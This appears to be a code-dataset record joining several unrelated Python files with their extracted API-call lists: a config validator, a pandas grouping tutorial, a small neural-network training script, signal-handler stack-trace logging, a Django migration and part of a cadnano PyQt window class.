'(multiple_data_test_cases)\n', (12101, 12127), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n')] |
import os
import sys
import configparser
class Config:
    """Thin helper around configparser for reading and validating cohort properties."""

    def __init__(self):
        pass

    #
    # a simple function to read an array of configuration files into a config object
    #
    def read_config(self, cfg_files):
        """Merge *cfg_files* (an iterable of paths) into one RawConfigParser.

        Later files override earlier ones; paths that do not exist are skipped.
        Prints an error and exits the process when no config object could be built.
        """
        # BUG FIX: `config` used to be unbound when cfg_files was None, so the
        # code below raised NameError instead of printing the message and exiting.
        config = None
        if cfg_files is not None:
            config = configparser.RawConfigParser()
            # merges all files into a single config (later files win on conflicts)
            for cfg_file in cfg_files:
                if os.path.exists(cfg_file):
                    config.read(cfg_file)
        if config is None:
            print("####################################")
            print("Did not find any configuration files")
            print("####################################")
            sys.exit(0)
        return config

    #
    # Validate properties
    #
    def validateProperties(self, config):
        """Sanity-check cohort properties; prints an error and exits on invalid combinations."""
        env = config.get('branch', 'env')
        # Cannot set both filter_care_sites and include_care_sites
        filter_care_sites = config.get(env + '.cohort', 'filter_care_sites').split(",")
        if not filter_care_sites[0]:  # empty option -> split(',') yields ['']
            filter_care_sites = []
        include_care_sites = config.get(env + '.cohort', 'include_care_sites').split(",")
        if not include_care_sites[0]:
            include_care_sites = []
        if len(filter_care_sites) > 0 and len(include_care_sites) > 0:
            print("###########################################################################")
            print("Cannot set both filter_care_sites and include_care_sites in properties file")
            print("###########################################################################")
            sys.exit(0)
        # If the user wants to dump the cohort back out to csv files, make sure the files
        # do not already exist
        write_csv_output = config.get(env + '.cohort', 'write_csv_output')
        csv_output_dir = config.get(env + '.cohort', 'csv_output_dir')
        if write_csv_output == "True" and len(os.listdir(csv_output_dir)) > 0:
            print("########################################")
            print(" Files already exist in output directory")
            print("########################################")
            sys.exit(0)
| [
"os.path.exists",
"configparser.RawConfigParser",
"os.listdir",
"sys.exit"
] | [((280, 310), 'configparser.RawConfigParser', 'configparser.RawConfigParser', ([], {}), '()\n', (308, 310), False, 'import configparser\n'), ((423, 447), 'os.path.exists', 'os.path.exists', (['cfg_file'], {}), '(cfg_file)\n', (437, 447), False, 'import os\n'), ((702, 713), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (710, 713), False, 'import sys\n'), ((1620, 1631), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1628, 1631), False, 'import sys\n'), ((2173, 2184), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (2181, 2184), False, 'import sys\n'), ((1941, 1967), 'os.listdir', 'os.listdir', (['csv_output_dir'], {}), '(csv_output_dir)\n', (1951, 1967), False, 'import os\n')] |
# %%
"""
Let's get familiar with Grouping and Aggregating.
Aggregating means combining multiple pieces of data into a single result.
Mean, median or the mode are aggregating functions.
"""
import pandas as pd
# %%
# Load the Stack Overflow 2019 survey answers (indexed by respondent id) and
# the question schema (indexed by column name).
# NOTE(review): paths are relative to the working directory - the script
# assumes it is run next to the "developer_survey_2019" folder.
df = pd.read_csv(
    "developer_survey_2019/survey_results_public.csv", index_col="Respondent")
schema_df = pd.read_csv(
    "developer_survey_2019/survey_results_schema.csv", index_col="Column")
# %%
# Raise the display limits so the wide survey frame is not truncated.
pd.set_option('display.max_columns', 85)
pd.set_option('display.max_rows', 85)
# %%
df.head()
# %%
"""In this column NaN means they ignore this question
and don't answer to that."""
df["ConvertedComp"].head(15)
# %%
# Median yearly compensation; pandas skips NaN values automatically.
df["ConvertedComp"].median()
# %%
# Median of every numeric column at once.
df.median()
# %%
"""df.describe() gives us count, mean, std, min, max and
some quantiles(25%, 50%, 75%)."""
df.describe()
# %%
# count() only counts non-NaN answers.
df["ConvertedComp"].count()
# %%
df["Hobbyist"]
# %%
# Frequency of each distinct answer (Yes/No).
df["Hobbyist"].value_counts()
# %%
df["SocialMedia"]
# %%
# Look up the full question text behind the SocialMedia column.
schema_df.loc["SocialMedia"]
# %%
df["SocialMedia"].value_counts()
# %%
"""Percentage form"""
df["SocialMedia"].value_counts(normalize=True)
# %%
"""
grouping our data:
A group by operation involves some combination of splitting up
our object applying a function and then combining those results
1_Splitting
2_Apply function
3_Combining the results
"""
df["Country"]
# %%
df["Country"].value_counts()
# %%
# groupby() alone is lazy - it only returns a DataFrameGroupBy object.
df.groupby(["Country"])
# %%
country_grp = df.groupby(["Country"])
# %%
# Pull out the sub-frame for a single group.
country_grp.get_group("United States")
# %%
"""Finding the most popular socialmedia in each country"""
filt = df["Country"] == "United States"
df.loc[filt]["SocialMedia"].value_counts()
# %%
country_grp["SocialMedia"].value_counts()
# %%
country_grp["SocialMedia"].value_counts().head(50)
# %%
"""country_grp method is better than filt way to doing this.
Because we don't need reload filter over and over."""
country_grp["SocialMedia"].value_counts().loc["United States"]
# %%
country_grp["ConvertedComp"].median()
# %%
country_grp["ConvertedComp"].median().loc["Germany"]
# %%
"""agg: Aggregating Methods"""
# agg() applies several aggregations in one pass and returns one column each.
country_grp["ConvertedComp"].agg(["median", "mean"])
# %%
country_grp["ConvertedComp"].agg(["median", "mean"]).loc["Canada"]
# %%
filt = (df["Country"] == "India")
df.loc[filt]["LanguageWorkedWith"]
# %%
df.loc[filt]["LanguageWorkedWith"].str.contains("Python")
# %%
"""
True : 1
False : 0
"""
df.loc[filt]["LanguageWorkedWith"].str.contains("Python").sum()
# %%
"""
It will raise an error.
country_grp["LanguageWorkedWith"].str.contains("Python").sum()
AttributeError: 'SeriesGroupBy' object has no attribute 'str'
"""
country_grp["LanguageWorkedWith"].apply(
lambda x: x.str.contains("Python").sum())
# %%
country_respondents = df["Country"].value_counts()
country_respondents
# %%
country_uses_python = country_grp["LanguageWorkedWith"].apply(
lambda x: x.str.contains("Python").sum())
country_uses_python
# %%
"""Concatenate two columns to make a new dataframe."""
python_df = pd.concat(
[country_respondents, country_uses_python], axis="columns", sort=False)
python_df
# %%
python_df.rename(columns={"Country": "NumRespondants",
"LanguageWorkedWith": "NumKnowsPython"},
inplace=True)
# %%
python_df
# %%
python_df["PctKnowsPython"] = (
python_df["NumKnowsPython"]/python_df["NumRespondants"]*100)
# %%
python_df
# %%
python_df.sort_values(by="PctKnowsPython", ascending=False, inplace=True)
# %%
python_df
# %%
python_df.head(50)
# %%
python_df.loc["Japan"]
# %%
python_df.sort_values(
by=["NumRespondants", "PctKnowsPython"], ascending=False, inplace=True)
# %%
python_df.head(50)
# %%
| [
"pandas.concat",
"pandas.read_csv",
"pandas.set_option"
] | [((228, 319), 'pandas.read_csv', 'pd.read_csv', (['"""developer_survey_2019/survey_results_public.csv"""'], {'index_col': '"""Respondent"""'}), "('developer_survey_2019/survey_results_public.csv', index_col=\n 'Respondent')\n", (239, 319), True, 'import pandas as pd\n'), ((334, 421), 'pandas.read_csv', 'pd.read_csv', (['"""developer_survey_2019/survey_results_schema.csv"""'], {'index_col': '"""Column"""'}), "('developer_survey_2019/survey_results_schema.csv', index_col=\n 'Column')\n", (345, 421), True, 'import pandas as pd\n'), ((430, 470), 'pandas.set_option', 'pd.set_option', (['"""display.max_columns"""', '(85)'], {}), "('display.max_columns', 85)\n", (443, 470), True, 'import pandas as pd\n'), ((472, 509), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', '(85)'], {}), "('display.max_rows', 85)\n", (485, 509), True, 'import pandas as pd\n'), ((2996, 3082), 'pandas.concat', 'pd.concat', (['[country_respondents, country_uses_python]'], {'axis': '"""columns"""', 'sort': '(False)'}), "([country_respondents, country_uses_python], axis='columns', sort=\n False)\n", (3005, 3082), True, 'import pandas as pd\n')] |
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import minmax_scale
import matplotlib.pyplot as plt
from model.loss import CategoricalCrossEntropy
from model.layers.dense import Dense
from model.layers.relu import LeakyReLU
from model.layers.softmax import Softmax
from model.neural_network import NeuralNetwork
def spiral_data(points, classes):
X = np.zeros((points * classes, 2))
y = np.zeros(points * classes, dtype='uint8')
for class_number in range(classes):
ix = range(points * class_number, points * (class_number + 1))
r = np.linspace(0.0, 1, points) # radius
t = np.linspace(class_number * 4, (class_number + 1) * 4, points) + np.random.randn(points) * 0.2
X[ix] = np.c_[r * np.sin(t * 2.5), r * np.cos(t * 2.5)]
y[ix] = class_number
return X, y
# ------------------------------------ DATASET
N = 200 # number of points per class
D = 2 # dimensionality
K = 3 # number of classes
X, y = spiral_data(points=N, classes=K)
print("Scale values")
print('Min: %.3f, Max: %.3f' % (X.min(), X.max()))
X = minmax_scale(X, feature_range=(0, 1))
print('Min: %.3f, Max: %.3f' % (X.min(), X.max()))
# plt.scatter(X[:, 0], X[:, 1], c=y, s=40, cmap=plt.cm.Spectral)
# plt.show()
# ------------------------------------ SPLIT DATA
"""X_train, X_test, y_train, y_test = train_test_split(X,
y,
test_size=0.1,
random_state=65)"""
# ------------------------------------ HYPER PARAMETERS
STEP_SIZE = 1e-1
N_EPOCHS = 2000
BATCH_SIZE = 32
# ------------------------------------ BUILD THE MODEL
nn = NeuralNetwork([
Dense(200), LeakyReLU(),
Dense(100), LeakyReLU(),
Dense(50), LeakyReLU(),
Dense(K), Softmax()
], CategoricalCrossEntropy())
# ------------------------------------ FIT THE MODEL
nn.train(dataset=X,
labels=y,
epochs=N_EPOCHS,
batch_size=BATCH_SIZE,
step_size=STEP_SIZE)
# ------------------------------------ EVALUATE THE MODEL
train_loss = nn.metrics.history['train_loss']
val_loss = nn.metrics.history['val_loss']
epochs = range(0, N_EPOCHS)
plt.plot(epochs, train_loss, 'g', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='validation loss')
plt.title('Training and Validation loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
print(f"train loss: {train_loss}")
print(f"val loss: {val_loss}")
train_acc = nn.metrics.history['train_acc']
val_acc = nn.metrics.history['val_acc']
epochs = range(0, N_EPOCHS)
plt.plot(epochs, train_acc, 'g', label='Training accuracy')
plt.plot(epochs, val_acc, 'b', label='validation accuracy')
plt.title('Training and Validation accuracy')
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend()
plt.show()
print(f"train acc: {train_acc}")
print(f"val acc: {val_acc}")
| [
"model.loss.CategoricalCrossEntropy",
"model.layers.relu.LeakyReLU",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"model.layers.dense.Dense",
"numpy.zeros",
"numpy.linspace",
"sklearn.preprocessing.minmax_scale",
"model.layers.softmax.Softmax",
"numpy.cos",
... | [((1123, 1160), 'sklearn.preprocessing.minmax_scale', 'minmax_scale', (['X'], {'feature_range': '(0, 1)'}), '(X, feature_range=(0, 1))\n', (1135, 1160), False, 'from sklearn.preprocessing import minmax_scale\n'), ((2273, 2329), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'train_loss', '"""g"""'], {'label': '"""Training loss"""'}), "(epochs, train_loss, 'g', label='Training loss')\n", (2281, 2329), True, 'import matplotlib.pyplot as plt\n'), ((2330, 2386), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'val_loss', '"""b"""'], {'label': '"""validation loss"""'}), "(epochs, val_loss, 'b', label='validation loss')\n", (2338, 2386), True, 'import matplotlib.pyplot as plt\n'), ((2387, 2428), 'matplotlib.pyplot.title', 'plt.title', (['"""Training and Validation loss"""'], {}), "('Training and Validation loss')\n", (2396, 2428), True, 'import matplotlib.pyplot as plt\n'), ((2429, 2449), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Epochs"""'], {}), "('Epochs')\n", (2439, 2449), True, 'import matplotlib.pyplot as plt\n'), ((2450, 2468), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Loss"""'], {}), "('Loss')\n", (2460, 2468), True, 'import matplotlib.pyplot as plt\n'), ((2469, 2481), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (2479, 2481), True, 'import matplotlib.pyplot as plt\n'), ((2482, 2492), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2490, 2492), True, 'import matplotlib.pyplot as plt\n'), ((2673, 2732), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'train_acc', '"""g"""'], {'label': '"""Training accuracy"""'}), "(epochs, train_acc, 'g', label='Training accuracy')\n", (2681, 2732), True, 'import matplotlib.pyplot as plt\n'), ((2733, 2792), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'val_acc', '"""b"""'], {'label': '"""validation accuracy"""'}), "(epochs, val_acc, 'b', label='validation accuracy')\n", (2741, 2792), True, 'import matplotlib.pyplot as plt\n'), ((2793, 2838), 'matplotlib.pyplot.title', 
'plt.title', (['"""Training and Validation accuracy"""'], {}), "('Training and Validation accuracy')\n", (2802, 2838), True, 'import matplotlib.pyplot as plt\n'), ((2839, 2859), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Epochs"""'], {}), "('Epochs')\n", (2849, 2859), True, 'import matplotlib.pyplot as plt\n'), ((2860, 2882), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Accuracy"""'], {}), "('Accuracy')\n", (2870, 2882), True, 'import matplotlib.pyplot as plt\n'), ((2883, 2895), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (2893, 2895), True, 'import matplotlib.pyplot as plt\n'), ((2896, 2906), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2904, 2906), True, 'import matplotlib.pyplot as plt\n'), ((408, 439), 'numpy.zeros', 'np.zeros', (['(points * classes, 2)'], {}), '((points * classes, 2))\n', (416, 439), True, 'import numpy as np\n'), ((448, 489), 'numpy.zeros', 'np.zeros', (['(points * classes)'], {'dtype': '"""uint8"""'}), "(points * classes, dtype='uint8')\n", (456, 489), True, 'import numpy as np\n'), ((1890, 1915), 'model.loss.CategoricalCrossEntropy', 'CategoricalCrossEntropy', ([], {}), '()\n', (1913, 1915), False, 'from model.loss import CategoricalCrossEntropy\n'), ((613, 640), 'numpy.linspace', 'np.linspace', (['(0.0)', '(1)', 'points'], {}), '(0.0, 1, points)\n', (624, 640), True, 'import numpy as np\n'), ((1781, 1791), 'model.layers.dense.Dense', 'Dense', (['(200)'], {}), '(200)\n', (1786, 1791), False, 'from model.layers.dense import Dense\n'), ((1793, 1804), 'model.layers.relu.LeakyReLU', 'LeakyReLU', ([], {}), '()\n', (1802, 1804), False, 'from model.layers.relu import LeakyReLU\n'), ((1810, 1820), 'model.layers.dense.Dense', 'Dense', (['(100)'], {}), '(100)\n', (1815, 1820), False, 'from model.layers.dense import Dense\n'), ((1822, 1833), 'model.layers.relu.LeakyReLU', 'LeakyReLU', ([], {}), '()\n', (1831, 1833), False, 'from model.layers.relu import LeakyReLU\n'), ((1839, 1848), 'model.layers.dense.Dense', 
'Dense', (['(50)'], {}), '(50)\n', (1844, 1848), False, 'from model.layers.dense import Dense\n'), ((1850, 1861), 'model.layers.relu.LeakyReLU', 'LeakyReLU', ([], {}), '()\n', (1859, 1861), False, 'from model.layers.relu import LeakyReLU\n'), ((1867, 1875), 'model.layers.dense.Dense', 'Dense', (['K'], {}), '(K)\n', (1872, 1875), False, 'from model.layers.dense import Dense\n'), ((1877, 1886), 'model.layers.softmax.Softmax', 'Softmax', ([], {}), '()\n', (1884, 1886), False, 'from model.layers.softmax import Softmax\n'), ((663, 724), 'numpy.linspace', 'np.linspace', (['(class_number * 4)', '((class_number + 1) * 4)', 'points'], {}), '(class_number * 4, (class_number + 1) * 4, points)\n', (674, 724), True, 'import numpy as np\n'), ((727, 750), 'numpy.random.randn', 'np.random.randn', (['points'], {}), '(points)\n', (742, 750), True, 'import numpy as np\n'), ((783, 798), 'numpy.sin', 'np.sin', (['(t * 2.5)'], {}), '(t * 2.5)\n', (789, 798), True, 'import numpy as np\n'), ((804, 819), 'numpy.cos', 'np.cos', (['(t * 2.5)'], {}), '(t * 2.5)\n', (810, 819), True, 'import numpy as np\n')] |
# Copyright (C) 2019 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import linecache
import logging
import os
import signal
import sys
_log = logging.getLogger(__name__)
def log_stack_trace(frame, file):
file.write('Traceback(most recent call last):\n')
def func(frame):
if not frame:
return
func(frame.f_back)
file.write(' File "{}", line {}, in {}\n'.format(frame.f_code.co_filename, frame.f_lineno, frame.f_code.co_name))
file.write(' {}\n'.format(linecache.getline(frame.f_code.co_filename, frame.f_lineno).lstrip().rstrip()))
func(frame)
class StackTraceFileContext(object):
def __init__(self, output_file=None):
self.file_name = None
if output_file:
self.file_name = os.path.join(os.path.dirname(output_file), '{}-{}'.format(os.getpid(), os.path.basename(output_file)))
self.file = sys.stderr
def __enter__(self):
if self.file_name:
self.file = open(self.file_name, 'w')
_log.critical('Stack trace saved to {}'.format(self.file_name))
else:
self.file.write('\n')
return self.file
def __exit__(self, *args):
if self.file_name:
self.file.close()
self.file = sys.stderr
def log_stack_trace_on_term(output_file=None):
def handler(signum, frame):
with StackTraceFileContext(output_file=output_file) as file:
file.write('SIGTERM signal received')
log_stack_trace(frame, file)
exit(-1)
signal.signal(signal.SIGTERM, handler)
def log_stack_trace_on_ctrl_c(output_file=None):
def handler(signum, frame):
with StackTraceFileContext(output_file=output_file) as file:
file.write('CTRL+C received\n')
log_stack_trace(frame, file)
raise KeyboardInterrupt
signal.signal(signal.SIGINT, handler)
| [
"logging.getLogger",
"signal.signal",
"os.path.dirname",
"os.path.basename",
"os.getpid",
"linecache.getline"
] | [((1405, 1432), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1422, 1432), False, 'import logging\n'), ((2804, 2842), 'signal.signal', 'signal.signal', (['signal.SIGTERM', 'handler'], {}), '(signal.SIGTERM, handler)\n', (2817, 2842), False, 'import signal\n'), ((3118, 3155), 'signal.signal', 'signal.signal', (['signal.SIGINT', 'handler'], {}), '(signal.SIGINT, handler)\n', (3131, 3155), False, 'import signal\n'), ((2047, 2075), 'os.path.dirname', 'os.path.dirname', (['output_file'], {}), '(output_file)\n', (2062, 2075), False, 'import os\n'), ((2092, 2103), 'os.getpid', 'os.getpid', ([], {}), '()\n', (2101, 2103), False, 'import os\n'), ((2105, 2134), 'os.path.basename', 'os.path.basename', (['output_file'], {}), '(output_file)\n', (2121, 2134), False, 'import os\n'), ((1773, 1832), 'linecache.getline', 'linecache.getline', (['frame.f_code.co_filename', 'frame.f_lineno'], {}), '(frame.f_code.co_filename, frame.f_lineno)\n', (1790, 1832), False, 'import linecache\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-10 16:15
from __future__ import unicode_literals
from django.db import migrations, models
import django_extensions.db.fields
import items.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('title', models.CharField(max_length=255, verbose_name='title')),
('description', models.TextField(blank=True, null=True, verbose_name='description')),
('image', models.ImageField(upload_to=items.models.image_upload_to, verbose_name='original image')),
],
options={
'abstract': False,
},
),
]
| [
"django.db.models.ImageField",
"django.db.models.TextField",
"django.db.models.AutoField",
"django.db.models.CharField"
] | [((418, 511), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (434, 511), False, 'from django.db import migrations, models\n'), ((784, 838), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'verbose_name': '"""title"""'}), "(max_length=255, verbose_name='title')\n", (800, 838), False, 'from django.db import migrations, models\n'), ((873, 940), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'null': '(True)', 'verbose_name': '"""description"""'}), "(blank=True, null=True, verbose_name='description')\n", (889, 940), False, 'from django.db import migrations, models\n'), ((969, 1062), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': 'items.models.image_upload_to', 'verbose_name': '"""original image"""'}), "(upload_to=items.models.image_upload_to, verbose_name=\n 'original image')\n", (986, 1062), False, 'from django.db import migrations, models\n')] |
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QSettings
from PyQt5.QtCore import QPoint, QSize
from PyQt5.QtWidgets import QGraphicsScene
from PyQt5.QtWidgets import QMainWindow
from PyQt5.QtWidgets import QGraphicsItem
from PyQt5.QtWidgets import QAction, QApplication, QWidget
from cadnano import app
from cadnano.gui.mainwindow import ui_mainwindow
from cadnano.proxies.cnenum import OrthoViewType
from cadnano.views.gridview.gridrootitem import GridRootItem
from cadnano.views.gridview.tools.gridtoolmanager import GridToolManager
from cadnano.views.pathview.colorpanel import ColorPanel
from cadnano.views.pathview.pathrootitem import PathRootItem
from cadnano.views.pathview.tools.pathtoolmanager import PathToolManager
from cadnano.views.sliceview.slicerootitem import SliceRootItem
from cadnano.views.sliceview.tools.slicetoolmanager import SliceToolManager
# from PyQt5.QtOpenGL import QGLWidget
# # check out https://github.com/baoboa/pyqt5/tree/master/examples/opengl
# # for an example of the QOpenGlWidget added in Qt 5.4
class DocumentWindow(QMainWindow, ui_mainwindow.Ui_MainWindow):
"""DocumentWindow subclasses QMainWindow and Ui_MainWindow. It performs
some initialization operations that must be done in code rather than
using Qt Creator.
Attributes:
controller (DocumentController):
"""
def __init__(self, parent=None, doc_ctrlr=None):
super(DocumentWindow, self).__init__(parent)
self.controller = doc_ctrlr
doc = doc_ctrlr.document()
self.setupUi(self)
self.settings = QSettings("cadnano.org", "cadnano2.5")
# Appearance pref
if not app().prefs.show_icon_labels:
self.main_toolbar.setToolButtonStyle(Qt.ToolButtonIconOnly)
# Outliner & PropertyEditor setup
self.outliner_widget.configure(window=self, document=doc)
self.property_widget.configure(window=self, document=doc)
self.property_buttonbox.setVisible(False)
self.tool_managers = None # initialize
self._initSliceview(doc)
self._initGridview(doc)
self._initPathview(doc)
self._initPathviewToolbar()
self._initEditMenu()
self.path_dock_widget.setTitleBarWidget(QWidget())
self.grid_dock_widget.setTitleBarWidget(QWidget())
self.slice_dock_widget.setTitleBarWidget(QWidget())
self.inspector_dock_widget.setTitleBarWidget(QWidget())
self.setCentralWidget(None)
if app().prefs.orthoview_style == OrthoViewType.SLICE:
self.splitDockWidget(self.slice_dock_widget, self.path_dock_widget, Qt.Horizontal)
elif app().prefs.orthoview_style == OrthoViewType.GRID:
self.splitDockWidget(self.grid_dock_widget, self.path_dock_widget, Qt.Horizontal)
self._restoreGeometryandState()
self._finishInit()
doc.setViewNames(['slice', 'path', 'inspector'])
# end def
def document(self):
return self.controller.document()
def destroyWin(self):
self.settings.beginGroup("MainWindow")
self.settings.setValue("state", self.saveState())
self.settings.endGroup()
for mgr in self.tool_managers:
mgr.destroy()
self.controller = None
### ACCESSORS ###
def undoStack(self):
return self.controller.undoStack()
def selectedInstance(self):
return self.controller.document().selectedInstance()
def activateSelection(self, isActive):
self.path_graphics_view.activateSelection(isActive)
self.slice_graphics_view.activateSelection(isActive)
self.grid_graphics_view.activateSelection(isActive)
### EVENT HANDLERS ###
def focusInEvent(self):
"""Handle an OS focus change into cadnano."""
app().undoGroup.setActiveStack(self.controller.undoStack())
def moveEvent(self, event):
"""Handle the moving of the cadnano window itself.
Reimplemented to save state on move.
"""
self.settings.beginGroup("MainWindow")
self.settings.setValue("geometry", self.saveGeometry())
self.settings.setValue("pos", self.pos())
self.settings.endGroup()
def resizeEvent(self, event):
"""Handle the resizing of the cadnano window itself.
Reimplemented to save state on resize.
"""
self.settings.beginGroup("MainWindow")
self.settings.setValue("geometry", self.saveGeometry())
self.settings.setValue("size", self.size())
self.settings.endGroup()
QWidget.resizeEvent(self, event)
def changeEvent(self, event):
QWidget.changeEvent(self, event)
# end def
### DRAWING RELATED ###
### PRIVATE HELPER METHODS ###
def _restoreGeometryandState(self):
self.settings.beginGroup("MainWindow")
geometry = self.settings.value("geometry")
state = self.settings.value("geometry")
if geometry is not None:
result = self.restoreGeometry(geometry)
if result is False:
print("MainWindow.restoreGeometry() failed.")
else:
print("Setting default MainWindow size: 1100x800")
self.resize(self.settings.value("size", QSize(1100, 800)))
self.move(self.settings.value("pos", QPoint(200, 200)))
self.inspector_dock_widget.close()
self.action_inspector.setChecked(False)
state = self.settings.value("state")
if state is not None:
result = self.restoreState(state)
if result is False:
print("MainWindow.restoreState() failed.")
self.settings.endGroup()
# end def
def _initGridview(self, doc):
"""Initializes Grid View.
Args:
doc (cadnano.document.Document): The Document corresponding to
the design
Returns: None
"""
self.grid_scene = QGraphicsScene(parent=self.grid_graphics_view)
self.grid_root = GridRootItem(rect=self.grid_scene.sceneRect(),
parent=None,
window=self,
document=doc)
self.grid_root.setFlag(QGraphicsItem.ItemHasNoContents)
self.grid_scene.addItem(self.grid_root)
self.grid_scene.setItemIndexMethod(QGraphicsScene.NoIndex)
assert self.grid_root.scene() == self.grid_scene
self.grid_graphics_view.setScene(self.grid_scene)
self.grid_graphics_view.scene_root_item = self.grid_root
self.grid_graphics_view.setName("GridView")
self.grid_tool_manager = GridToolManager(self, self.grid_root)
# end def
def _initPathview(self, doc):
"""Initializes Path View.
Args:
doc (cadnano.document.Document): The Document corresponding to
the design
Returns: None
"""
self.path_scene = QGraphicsScene(parent=self.path_graphics_view)
self.path_root = PathRootItem(rect=self.path_scene.sceneRect(),
parent=None,
window=self,
document=doc)
self.path_root.setFlag(QGraphicsItem.ItemHasNoContents)
self.path_scene.addItem(self.path_root)
self.path_scene.setItemIndexMethod(QGraphicsScene.NoIndex)
assert self.path_root.scene() == self.path_scene
self.path_graphics_view.setScene(self.path_scene)
self.path_graphics_view.scene_root_item = self.path_root
self.path_graphics_view.setScaleFitFactor(0.7)
self.path_graphics_view.setName("PathView")
# end def
def _initPathviewToolbar(self):
"""Initializes Path View Toolbar.
Returns: None
"""
self.path_color_panel = ColorPanel()
self.path_graphics_view.toolbar = self.path_color_panel # HACK for customqgraphicsview
self.path_scene.addItem(self.path_color_panel)
self.path_tool_manager = PathToolManager(self, self.path_root)
self.slice_tool_manager.path_tool_manager = self.path_tool_manager
self.path_tool_manager.slice_tool_manager = self.slice_tool_manager
self.grid_tool_manager.path_tool_manager = self.path_tool_manager
self.path_tool_manager.grid_tool_manager = self.grid_tool_manager
self.tool_managers = (self.path_tool_manager, self.slice_tool_manager, self.grid_tool_manager)
self.insertToolBarBreak(self.main_toolbar)
self.path_graphics_view.setupGL()
self.slice_graphics_view.setupGL()
self.grid_graphics_view.setupGL()
# end def
def _initSliceview(self, doc):
"""Initializes Slice View.
Args:
doc (cadnano.document.Document): The Document corresponding to
the design
Returns: None
"""
self.slice_scene = QGraphicsScene(parent=self.slice_graphics_view)
self.slice_root = SliceRootItem(rect=self.slice_scene.sceneRect(),
parent=None,
window=self,
document=doc)
self.slice_root.setFlag(QGraphicsItem.ItemHasNoContents)
self.slice_scene.addItem(self.slice_root)
self.slice_scene.setItemIndexMethod(QGraphicsScene.NoIndex)
assert self.slice_root.scene() == self.slice_scene
self.slice_graphics_view.setScene(self.slice_scene)
self.slice_graphics_view.scene_root_item = self.slice_root
self.slice_graphics_view.setName("SliceView")
self.slice_graphics_view.setScaleFitFactor(0.7)
self.slice_tool_manager = SliceToolManager(self, self.slice_root)
# end def
def _initEditMenu(self):
"""Initializes the Edit menu
Returns: None
"""
self.actionUndo = self.controller.undoStack().createUndoAction(self)
self.actionRedo = self.controller.undoStack().createRedoAction(self)
self.actionUndo.setText(QApplication.translate("MainWindow", "Undo", None))
self.actionUndo.setShortcut(QApplication.translate("MainWindow", "Ctrl+Z", None))
self.actionRedo.setText(QApplication.translate("MainWindow", "Redo", None))
self.actionRedo.setShortcut(QApplication.translate("MainWindow", "Ctrl+Shift+Z", None))
self.sep = QAction(self)
self.sep.setSeparator(True)
self.menu_edit.insertAction(self.sep, self.actionRedo)
self.menu_edit.insertAction(self.actionRedo, self.actionUndo)
# self.main_splitter.setSizes([400, 400, 180]) # balance main_splitter size
self.statusBar().showMessage("")
# end def
def _finishInit(self):
"""
Handle the dockwindow visibility and action checked status.
The console visibility is explicitly stored in the settings file,
